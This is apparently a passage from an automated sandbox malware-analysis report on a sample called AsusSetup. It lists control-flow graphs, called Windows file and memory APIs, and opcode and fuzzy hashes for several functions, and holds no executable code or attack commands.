                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 325 1fd6149-1fd6152 326 1fd61b5-1fd61cb 325->326 327 1fd6155 325->327 330 1fd61cd 326->330 331 1fd615c-1fd616c SetFilePointerEx 326->331 328 1fd615b 327->328 329 1fd6244 327->329 334 1fd618e-1fd61a0 328->334 339 1fd61ac 329->339 340 1fd6240 call 20072f4 329->340 330->331 335 1fd61cf-1fd61e7 ReadFile 330->335 333 1fd622c 331->333 337 1fd622e-1fd623b 333->337 338 1fd6220-1fd6226 333->338 348 1fd620b 334->348 359 1fd6189 335->359 343 1fd623d 337->343 344 1fd61f0 call 20072ec 337->344 346 1fd61fc 338->346 347 1fd6228 338->347 339->340 345 1fd61b2 339->345 340->338 343->344 355 1fd623f 343->355 360 1fd61f5 VirtualAlloc 344->360 345->334 353 1fd61ff-1fd6203 346->353 354 1fd61eb-1fd61ef 346->354 347->333 357 1fd61fa 347->357 350 1fd620d-1fd6213 348->350 351 1fd6215 348->351 350->329 350->351 351->353 353->329 358 1fd6205 353->358 355->355 357->346 358->327 361 1fd618b 359->361 362 1fd6190 359->362 360->357 361->362 363 1fd618d-1fd61e7 361->363 362->329 364 1fd6194-1fd61a0 362->364 363->359 364->348
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: dcd7d6061518b5e23cc30ba14f8cd645cc1f06b40db9b23a040c2072c8923b03
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 95eecba4fa708119a0501cceb86e4bd640af147089680334923987f5823312c8
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcd7d6061518b5e23cc30ba14f8cd645cc1f06b40db9b23a040c2072c8923b03
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53213433A0C648CAFB655B3C98483357B93F78973AF0C432BD456C21A3DE6B91028342
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8B33 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 366 1fd8b33-1fd8b4e WriteFile 368 1fd8b7b-1fd8fb7 SetFilePointerEx 366->368 369 1fd8b50 366->369 373 1fd8fbd-1fd910c 368->373 374 1fd8c46 368->374 369->368 370 1fd8b52-1fd9053 369->370 370->366 378 1fd9059 370->378 379 1fd89b8-1fd89c3 call 1fda380 373->379 380 1fd9112 373->380 377 1fd8c98-1fd8cad call 1fd99f0 374->377 386 1fd9087-1fd9088 377->386 387 1fd8cb3 377->387 378->378 389 1fd89ac-1fd89af 379->389 390 1fd89c5 379->390 380->379 383 1fd9118 380->383 383->383 388 1fd90f0 386->388 387->386 391 1fd8cb9 387->391 392 1fd8b9f 388->392 393 1fd90f6 388->393 389->374 390->366 394 1fd8f69 390->394 395 1fd8d6a-1fd8d6d 391->395 392->395 394->389 396 1fd8f6f-1fd8f71 394->396 395->377 397 1fd8f73-1fd8f7b call 1fd99f0 396->397 400 1fd8dcc-1fd8dd8 397->400 401 1fd8f81 397->401 402 1fd8e2b-1fd8e37 call 1fdd590 400->402 403 1fd8dda 400->403 401->400 404 1fd8f87-1fd900a 401->404 415 1fd8ea3-1fd8eb2 402->415 403->402 407 1fd8ddc-1fd8de1 403->407 409 1fd8a1d-1fd8a20 404->409 410 1fd9010 404->410 411 1fd8de3 407->411 413 1fd8f3b 409->413 414 1fd8a26 409->414 410->409 412 1fd9016 410->412 411->388 412->386 417 1fd8f0a-1fd8f0e 413->417 414->413 416 1fd8a2c 414->416 415->397 418 1fd8eb8 415->418 416->392 419 1fd8965-1fd8d74 call 1fd9c70 416->419 417->415 420 1fd8f10 417->420 418->397 422 1fd8ebe 418->422 419->374 427 1fd8d7a-1fd8d81 419->427 420->415 423 1fd8f12 420->423 422->417 423->411 427->392 428 1fd8d87 427->428 428->388
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 96d675477f5884ca1f21a6f8044b01c34adb70bd1f4ac458339bad4b2e7f88fe
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9e25c5fc41b92ab76dfbcb6a91d3f38c3cc8d532c7c3cc7d5a1c069573b94e81
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96d675477f5884ca1f21a6f8044b01c34adb70bd1f4ac458339bad4b2e7f88fe
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3F02221A1CB05DAEB2B836C08A42393A93EBC85E4B0D416AC687C3292CD2748074203
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD9180 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 429 1fd9180-1fd93a4 433 1fd93a7 429->433 434 1fd93ad-1fd93b1 433->434 435 1fd91f0-1fd91f2 433->435 438 1fd936a-1fd9377 434->438 436 1fd91f4 435->436 437 1fd9256-1fd9259 435->437 439 1fd931b-1fd931e 436->439 440 1fd925b-1fd9275 437->440 441 1fd92c6 437->441 442 1fd92e4 call 20072f4 439->442 440->441 445 1fd9277-1fd927d 440->445 444 1fd93c5-1fd93cd 441->444 452 1fd92e9 442->452 444->439 447 1fd93d6-1fd93dd 444->447 450 1fd927f-1fd9327 445->450 451 1fd9250 445->451 448 1fd91e0-1fd91e4 447->448 449 1fd93e3 447->449 458 1fd9207-1fd93bd 448->458 459 1fd91e6 448->459 453 1fd941c 449->453 454 1fd93e5 449->454 463 1fd9329 450->463 464 1fd92db-1fd92de 450->464 451->437 451->439 456 1fd92ef 452->456 457 1fd944b-1fd944e 452->457 470 1fd9359-1fd935d 453->470 471 1fd92b8-1fd92ba 453->471 454->453 462 1fd93e7-1fd943b 454->462 456->457 465 1fd92f5-1fd9305 456->465 474 1fd94be-1fd94c7 457->474 458->444 459->458 466 1fd91e8-1fd91ef 459->466 477 1fd9441 462->477 478 1fd91d3-1fd94ac 462->478 463->464 469 1fd932b-1fd9335 463->469 464->442 467 1fd92cc-1fd92d4 SetFilePointerEx 464->467 472 1fd9478-1fd947c 465->472 473 1fd930b 465->473 466->435 467->439 475 1fd92d6-1fd9305 467->475 476 1fd9485-1fd949a call 1fd6250 469->476 470->438 479 1fd91fa-1fd940e 471->479 480 1fd92c0 471->480 472->476 473->472 481 1fd9311 473->481 474->447 475->472 475->473 491 1fd933a 476->491 492 1fd94a0 476->492 477->478 485 1fd9447-1fd9449 477->485 478->457 498 1fd94ae 478->498 479->469 490 1fd9414 479->490 480->441 480->479 481->439 485->457 490->469 496 1fd941a 490->496 494 1fd928b-1fd9292 491->494 495 1fd9340-1fd9343 491->495 492->491 497 1fd94a6 492->497 494->435 499 1fd9298 494->499 496->453 500 1fd937d-1fd938c call 1fd6150 498->500 501 1fd94b4 498->501 499->433 500->457 505 1fd9392-1fd9394 500->505 501->500 502 1fd94ba-1fd94bc 501->502 502->474
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cbf6bd2aa41ab4d748ede1907bad094a449333e7c2c1b9fb22cf0f88fd851f0e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e940b1cea812b3747d26a32b0143fad6a8b382cacbbb2d09e71037452a67ce0e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbf6bd2aa41ab4d748ede1907bad094a449333e7c2c1b9fb22cf0f88fd851f0e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11514622D0C685CFEB264BFC485817A3BA7BB4322DF0D526AD957C31E7D9E744068222
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FDA380 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 506 1fda380 507 1fda4de-1fda4e6 506->507 508 1fda386 506->508 509 1fda4ec-1fda62d 507->509 510 1fda5c4-1fda60b 507->510 508->507 511 1fda38c 508->511 509->510 516 1fda62f 509->516 510->516 519 1fda60d 510->519 513 1feca7b-1feca83 511->513 514 1fda392-1fda39d 511->514 517 1fda507-1fda50d 514->517 518 1fda3a3-1fda3af 514->518 520 1fda65a-1fda660 516->520 521 1fda64e SetFilePointerEx 517->521 522 1fda513 517->522 529 1fda455-1fda457 518->529 519->516 523 1fda60f-1fda615 519->523 524 1fda694-1fda6a0 520->524 525 1fda662 520->525 521->520 522->521 526 1fda519 522->526 524->513 530 1fda67b-1fda681 525->530 528 1fda591-1fda596 call 1fda9d0 526->528 533 1fda5ad 528->533 529->530 532 1fda45d-1fda466 529->532 530->533 534 1fda687-1fda68a 530->534 532->528 536 1fda46c 532->536 533->510 534->533 540 1fda690-1fda692 534->540 536->528 538 1fda472 536->538 538->529 540->524
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a56446c4e470bf6b7c3ee6f36cbd9dcf94501d6e54935f9ea76e47303719afa8
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: bb231e60e25399806cf1965930d129c0aa94671bebe2fc87de778d7e6e9d4649
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a56446c4e470bf6b7c3ee6f36cbd9dcf94501d6e54935f9ea76e47303719afa8
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED21E192D0E385CEEB270A3C581C3323FA79BD7018B4C04AAD583CB4A3EA478805825E
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD919A Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 541 1fd919a-1fd9421 ReadFile 543 1fd931b-1fd931e 541->543 544 1fd9427 541->544 545 1fd92e4 call 20072f4 543->545 546 1fd942d 544->546 547 1fd94be-1fd94c7 544->547 553 1fd92e9 545->553 546->547 549 1fd9433 546->549 548 1fd93d6-1fd93dd 547->548 551 1fd91e0-1fd91e4 548->551 552 1fd93e3 548->552 556 1fd9439-1fd943b 549->556 559 1fd9207-1fd93bd 551->559 560 1fd91e6 551->560 554 1fd941c 552->554 555 1fd93e5 552->555 557 1fd92ef 553->557 558 1fd944b-1fd944e 553->558 568 1fd9359-1fd935d 554->568 569 1fd92b8-1fd92ba 554->569 555->554 563 1fd93e7-1fd940a 555->563 564 1fd9441 556->564 565 1fd91d3-1fd94ac 556->565 557->558 566 1fd92f5-1fd9305 557->566 558->547 577 1fd93c5-1fd93cd 559->577 560->559 567 1fd91e8-1fd91ef 560->567 563->556 564->565 570 1fd9447-1fd9449 564->570 565->558 591 1fd94ae 565->591 572 1fd9478-1fd947c 566->572 573 1fd930b 566->573 574 1fd91f0-1fd91f2 567->574 586 1fd936a-1fd9377 568->586 578 1fd91fa-1fd940e 569->578 579 1fd92c0 569->579 570->558 585 1fd9485-1fd949a call 1fd6250 572->585 573->572 580 1fd9311 573->580 575 1fd91f4 574->575 576 1fd9256-1fd9259 574->576 575->543 582 1fd925b-1fd9275 576->582 583 1fd92c6 576->583 577->543 577->548 594 1fd932b-1fd9335 578->594 595 1fd9414 578->595 579->578 579->583 580->543 582->583 592 1fd9277-1fd927d 582->592 583->577 600 1fd933a 585->600 601 1fd94a0 585->601 596 1fd937d-1fd938c call 1fd6150 591->596 597 1fd94b4 591->597 598 1fd927f-1fd9327 592->598 599 1fd9250 592->599 594->585 595->594 602 1fd941a 595->602 596->558 613 1fd9392-1fd9394 596->613 597->596 603 1fd94ba-1fd94bc 597->603 609 1fd9329 598->609 610 1fd92db-1fd92de 598->610 599->543 599->576 604 1fd928b-1fd9292 600->604 605 1fd9340-1fd9343 600->605 601->600 608 1fd94a6 601->608 602->554 603->547 604->574 611 1fd9298-1fd93a7 604->611 609->594 609->610 610->545 614 1fd92cc-1fd92d4 SetFilePointerEx 610->614 611->574 617 1fd93ad-1fd93b1 611->617 614->543 616 1fd92d6-1fd9305 614->616 616->572 616->573 617->586
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6cb7926186666219dc51911799e237d0544c923c66407280de76e47373571a50
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a904797715e1d491aa2236d88c79c663f1e8c0e67bee76b6b78702169a0388fd
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cb7926186666219dc51911799e237d0544c923c66407280de76e47373571a50
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7001CC22D1E780CFE7271AFD08A90B53F23B94712CB0D81ABD582831B7D4CB05098367
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8E1A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 619 1fd8e1a-1fd8e1b 620 1fd8b6f-1fd8f55 SetFilePointerEx 619->620 621 1fd8e21 619->621 624 1fd8f5b 620->624 625 1fd8b45-1fd8b4e 620->625 621->620 623 1fd8e27-1fd8e29 621->623 626 1fd8e2b-1fd8e37 call 1fdd590 623->626 630 1fd8f61 624->630 631 1fd9162-1fd9168 624->631 627 1fd8b7b-1fd8fb7 SetFilePointerEx 625->627 628 1fd8b50 625->628 642 1fd8ea3-1fd8eb2 626->642 639 1fd8fbd-1fd910c 627->639 640 1fd8c46 627->640 628->627 632 1fd8b52-1fd9053 628->632 630->631 634 1fd8f67 call 1fd9180 630->634 635 1fe5d2a 631->635 647 1fd9059 632->647 648 1fd8b33-1fd8b43 WriteFile 632->648 634->635 635->635 651 1fd89b8-1fd89c3 call 1fda380 639->651 652 1fd9112 639->652 644 1fd8c98-1fd8cad call 1fd99f0 640->644 649 1fd8eb8 642->649 650 1fd8f73-1fd8f7b call 1fd99f0 642->650 663 1fd9087-1fd9088 644->663 664 1fd8cb3 644->664 647->647 648->625 649->650 656 1fd8ebe 649->656 669 1fd8dcc-1fd8dd8 650->669 670 1fd8f81 650->670 666 1fd89ac-1fd89af 651->666 667 1fd89c5 651->667 652->651 657 1fd9118 652->657 668 1fd8f0a-1fd8f0e 656->668 657->657 665 1fd90f0 663->665 664->663 671 1fd8cb9 664->671 672 1fd8b9f 665->672 673 1fd90f6 665->673 666->640 667->648 674 1fd8f69 667->674 668->642 675 1fd8f10 668->675 669->626 676 1fd8dda 669->676 670->669 677 1fd8f87-1fd900a 670->677 679 1fd8d6a-1fd8d6d 671->679 672->679 674->666 681 1fd8f6f-1fd8f71 674->681 675->642 680 1fd8f12 675->680 676->626 682 1fd8ddc-1fd8de1 676->682 683 1fd8a1d-1fd8a20 677->683 684 1fd9010 677->684 679->644 685 1fd8de3 680->685 681->650 682->685 687 1fd8f3b 683->687 688 1fd8a26 683->688 684->683 686 1fd9016 684->686 685->665 686->663 687->668 688->687 689 1fd8a2c 688->689 689->672 690 1fd8965-1fd8d74 call 1fd9c70 689->690 690->640 695 1fd8d7a-1fd8d81 690->695 695->672 696 1fd8d87 695->696 696->665
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f06da06f4a02658f6b5d2c9191a2a2c83fc033361b9e7c3f6dfe859081a38f85
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c28436554801e72dad5b829136d9bf787b9a971075b7daab6efc05bb0c55b1ba
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f06da06f4a02658f6b5d2c9191a2a2c83fc033361b9e7c3f6dfe859081a38f85
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D101F4A6D0C788CFD7665B7C48583357FA3AB42288F1D058AD1A6C61A3D6278C068702
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8A0E Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 697 1fd8a0e-1fd8a10 698 1fd8ee8-1fd8ef7 SetFilePointerEx 697->698 699 1fd8a16 697->699 701 1fd8efd 698->701 702 1fd8fec-1fd8fee 698->702 699->698 700 1fd8a1c 699->700 705 1fd8c46 700->705 701->702 706 1fd8f03 701->706 703 1fd8d1b 702->703 704 1fd8ff4 702->704 703->705 708 1fd8d21 703->708 704->703 707 1fd8ffa-1fd9126 call 1fdcda0 704->707 709 1fd8c98-1fd8cad call 1fd99f0 705->709 706->702 713 1fd8d8e 707->713 720 1fd912c 707->720 708->713 717 1fd9087-1fd90f0 709->717 718 1fd8cb3 709->718 713->705 716 1fd8d94-1fd90a2 713->716 723 1fd8b9f 717->723 724 1fd90f6 717->724 718->717 722 1fd8cb9 718->722 720->713 725 1fd9132-1fd9135 720->725 726 1fd8d6a-1fd8d6d 722->726 723->726 725->705 727 1fd913b-1fd9142 725->727 726->709
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8fb5c28e5d1c9eb1e11ce46e88e0860ba3941c2b0ac46eca638127c2fbbfd38b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a6e584e95c998f931321999c4e5cb36710a8d2fd236216f8402a607423bb5be4
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fb5c28e5d1c9eb1e11ce46e88e0860ba3941c2b0ac46eca638127c2fbbfd38b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF0F637D1DA0AC6BB3E9B9C04156367B57FB611C4F0C065ACD5387004DB23D0108983
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8BA6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 728 1fd8ba6-1fd9053 730 1fd9059 728->730 731 1fd8b33-1fd8b4e WriteFile 728->731 730->730 733 1fd8b7b-1fd8fb7 SetFilePointerEx 731->733 734 1fd8b50 731->734 737 1fd8fbd-1fd910c 733->737 738 1fd8c46 733->738 734->733 735 1fd8b52-1fd8b55 734->735 735->728 741 1fd89b8-1fd89c3 call 1fda380 737->741 742 1fd9112 737->742 740 1fd8c98-1fd8cad call 1fd99f0 738->740 748 1fd9087-1fd9088 740->748 749 1fd8cb3 740->749 751 1fd89ac-1fd89af 741->751 752 1fd89c5 741->752 742->741 745 1fd9118 742->745 745->745 750 1fd90f0 748->750 749->748 753 1fd8cb9 749->753 754 1fd8b9f 750->754 755 1fd90f6 750->755 751->738 752->731 756 1fd8f69 752->756 757 1fd8d6a-1fd8d6d 753->757 754->757 756->751 758 1fd8f6f-1fd8f71 756->758 757->740 759 1fd8f73-1fd8f7b call 1fd99f0 758->759 762 1fd8dcc-1fd8dd8 759->762 763 1fd8f81 759->763 764 1fd8e2b-1fd8e37 call 1fdd590 762->764 765 1fd8dda 762->765 763->762 766 1fd8f87-1fd900a 763->766 777 1fd8ea3-1fd8eb2 764->777 765->764 769 1fd8ddc-1fd8de1 765->769 771 1fd8a1d-1fd8a20 766->771 772 1fd9010 766->772 773 1fd8de3 769->773 775 1fd8f3b 771->775 776 1fd8a26 771->776 772->771 774 1fd9016 772->774 773->750 774->748 779 1fd8f0a-1fd8f0e 775->779 776->775 778 1fd8a2c 776->778 777->759 780 1fd8eb8 777->780 778->754 781 1fd8965-1fd8d74 call 1fd9c70 778->781 779->777 782 1fd8f10 779->782 780->759 784 1fd8ebe 780->784 781->738 789 1fd8d7a-1fd8d81 781->789 782->777 785 1fd8f12 782->785 784->779 785->773 789->754 790 1fd8d87 789->790 790->750
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b63effb34f7ad229d2f8481b85073b53b936557c6f19cf734c30284eb0ff6338
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 73fdcaa9c56b1b89847aca4816db34c961960007c423b9a582513d9bd49bd3ed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b63effb34f7ad229d2f8481b85073b53b936557c6f19cf734c30284eb0ff6338
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85E08C7100C700CBE716DB8CD488B3A7BD3FB88388F0C0418E68AC2260CB7A85898B42
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8F40 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
